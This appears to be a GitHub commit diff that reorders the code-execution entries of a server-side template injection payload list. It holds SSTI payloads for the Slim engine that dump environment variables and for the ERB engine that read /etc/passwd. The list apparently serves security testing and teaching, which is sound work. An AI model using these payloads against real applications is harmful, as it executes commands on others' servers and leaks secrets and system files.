Sorting like basic injection part

This commit is contained in:
idealphase
2020-04-30 17:15:31 +07:00
committed by GitHub
parent 7f1fb32980
commit 712e3b93f6

View File

@@ -91,17 +91,16 @@ Slim:
### Code execution
Execute code using SSTI for Slim engine.
```powershell
#{ %x|env| }
```
Execute code using SSTI for ERB engine.
```ruby
<%= system('cat /etc/passwd') %>
```
Execute code using SSTI for Slim engine.
```powershell
#{ %x|env| }
```
## Java